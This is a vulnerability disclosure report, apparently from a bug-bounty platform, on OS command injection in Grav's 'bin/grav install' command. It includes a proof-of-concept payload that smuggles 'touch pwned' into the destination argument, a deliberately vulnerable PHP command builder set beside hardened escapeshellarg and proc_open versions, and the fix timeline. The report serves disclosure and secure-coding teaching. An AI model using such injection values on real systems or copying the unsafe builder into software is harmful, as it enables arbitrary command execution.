Local Command Injection Post-Installation of Dependencies in getgrav/grav

Valid

Reported on May 27th 2022


Description

Grav versions <= 1.7.33 are vulnerable to OS command injection through the install subcommand of the grav CLI (bin/grav install). The subcommand installs the dependencies Grav needs, a predetermined set of plugin and theme repositories read from the .dependencies file, and takes a single argument: the destination directory into which those repositories are cloned. That argument is concatenated into a shell command string without any validation or quoting and passed straight to PHP's exec(), so shell metacharacters in the destination path break out of the intended command and are executed by the shell.

Proof of Concept

$ export DEST='x";touch pwned #"'
$ mkdir "$DEST" # to pass dependencies check
$ cp .dependencies .htaccess "$DEST" # to pass dependencies check
$ ./bin/grav install "$DEST"
# ...SNIPPED...
# Cloning Bits
# ============
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-problems -> x";touch pwned #"/user/plugins/problems
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-error -> x";touch pwned #"/user/plugins/error
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-plugin-markdown-notices -> x";touch pwned #"/user/plugins/markdown-notices
#
# sh: 1: cd: can't cd to x
# SUCCESS cloned https://github.com/getgrav/grav-theme-quark -> x";touch pwned #"/user/themes/quark
#
$ find . -name "pwned"
./pwned

The file pwned is created in the current working directory, which confirms that the injected command ran. The output also shows how: the double quote in the payload closes the quoted destination path right after x (hence "sh: 1: cd: can't cd to x"), the shell then runs ;touch pwned as a separate command, and the trailing # comments out the rest of the generated command line. The injected command therefore runs once per dependency; the SUCCESS lines are only the CLI's own progress output.
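To make the fix concrete, here is an added example (not Grav's own code, and not the patch that was merged) that reconstructs the shape of the vulnerable step, "cd into the destination, then git clone a predetermined repository", and puts it beside two hardened forms: the same shell command built with escapeshellarg(), and a version that avoids the shell entirely via proc_open() with an array argv. The function names and the two-entry dependency list are assumptions made for this illustration; the payload is the one from the proof of concept above.

```php
<?php
declare(strict_types=1);

// Added example, not Grav's own code. Function names and the dependency
// list below are assumptions made for this illustration.

/** Constructed dependency list standing in for the .dependencies file. */
const DEPENDENCIES = [
    'user/plugins/problems' => 'https://github.com/getgrav/grav-plugin-problems',
    'user/themes/quark'     => 'https://github.com/getgrav/grav-theme-quark',
];

/**
 * Vulnerable form: the caller-supplied destination is dropped into a shell
 * string unchanged. A double quote in $destination closes the quoted path,
 * and everything after it is parsed by the shell as further commands.
 */
function buildCloneCommandUnsafe(string $destination, string $path, string $repo): string
{
    return 'cd "' . $destination . '" && git clone ' . $repo . ' "' . $path . '"';
}

/**
 * Hardened form that still goes through a shell: every operand is passed
 * through escapeshellarg(), which single-quotes it (escaping any embedded
 * single quote), so ", ;, # and other metacharacters stay literal.
 */
function buildCloneCommandSafe(string $destination, string $path, string $repo): string
{
    return 'cd ' . escapeshellarg($destination)
        . ' && git clone ' . escapeshellarg($repo)
        . ' ' . escapeshellarg($path);
}

/**
 * Preferred form: no shell at all. proc_open() with an array command
 * (PHP >= 7.4) hands argv to git verbatim, so there is nothing to quote.
 * Returns git's exit status, or -1 if the process could not be started.
 */
function cloneWithoutShell(string $destination, string $path, string $repo): int
{
    $target = rtrim($destination, '/') . '/' . $path;
    $proc = proc_open(
        ['git', 'clone', $repo, $target],
        [1 => ['pipe', 'w'], 2 => ['pipe', 'w']],
        $pipes
    );
    if (!is_resource($proc)) {
        return -1;
    }
    fclose($pipes[1]);
    fclose($pipes[2]);
    return proc_close($proc);
}

// Demonstration with the payload from the proof of concept. The command
// strings are only printed, never executed, so this script is safe to run.
$payload = 'x";touch pwned #"';
foreach (DEPENDENCIES as $path => $repo) {
    echo "unsafe: ", buildCloneCommandUnsafe($payload, $path, $repo), "\n";
    echo "safe:   ", buildCloneCommandSafe($payload, $path, $repo), "\n\n";
}
```

Running it prints, for the unsafe builder, cd "x";touch pwned #"" && git clone ... , which the shell parses exactly as the proof-of-concept output shows (cd x fails, touch pwned runs, the clone is commented out). The escapeshellarg() version yields cd 'x";touch pwned #"' && ..., where the whole payload is one literal directory name. Note that checking the destination with is_dir() or file_exists() before building the command is not a defence on its own: the proof of concept simply creates a directory with the payload as its name to satisfy the dependencies check, and the injection still fires. Quote every operand, or better, do not hand the string to a shell at all.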

Impact

This issue leads to arbitrary command execution with the privileges of the user running bin/grav install. Anyone who can influence the destination argument, for example through a deployment script or wrapper that passes an attacker-controlled path, gets their payload executed once for every entry in .dependencies.

We are processing your report and will contact the getgrav/grav team within 24 hours. a month ago
Dwi Siswanto modified the report a month ago
We have contacted a member of the getgrav/grav team and are waiting to hear back a month ago
We have sent a follow up to the getgrav/grav team. We will try again in 7 days. a month ago
We have sent a second follow up to the getgrav/grav team. We will try again in 10 days. 19 days ago
Matias Griese 12 days ago

I cannot see how this is a security issue rather than a bug. Nevertheless, it's fixed now.

Matias Griese modified the Severity from Medium to Low 12 days ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Matias Griese validated this vulnerability 12 days ago
Dwi Siswanto has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Matias Griese confirmed that a fix has been merged on de4af5 12 days ago
Matias Griese has been awarded the fix bounty
InstallCommand.php#L150 has been validated